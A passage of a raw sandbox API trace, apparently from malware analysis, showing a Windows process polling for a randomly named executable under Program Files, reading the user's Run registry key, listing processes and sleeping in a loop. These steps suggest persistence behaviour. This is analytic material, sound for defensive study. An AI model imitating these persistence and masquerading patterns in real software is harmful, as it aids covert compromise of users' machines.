CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.585] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.585] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.585] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.679] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.694] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.694] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.694] NtClose (Handle=0x14c) returned 0x0 [0251.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.694] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.694] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.694] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.694] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.694] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.791] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.803] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.803] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.803] NtClose (Handle=0x14c) returned 0x0 [0251.803] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.803] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.804] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.804] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.804] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.804] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.893] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.898] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.898] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.898] NtClose (Handle=0x14c) returned 0x0 [0251.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.898] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.898] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.898] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.898] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0251.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0251.987] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0251.991] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0251.991] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0251.991] NtClose (Handle=0x14c) returned 0x0 [0251.991] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.991] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.991] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.991] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0251.991] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0251.991] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0251.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0251.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.105] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.116] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.116] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.116] NtClose (Handle=0x14c) returned 0x0 [0252.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.116] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.116] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.116] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.116] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.207] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.209] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.209] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.209] NtClose (Handle=0x14c) returned 0x0 [0252.209] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.210] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.210] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.210] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.210] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.210] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.309] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.318] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.319] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.319] NtClose (Handle=0x14c) returned 0x0 [0252.319] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.319] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.319] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.319] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.319] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.319] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.410] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.411] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, 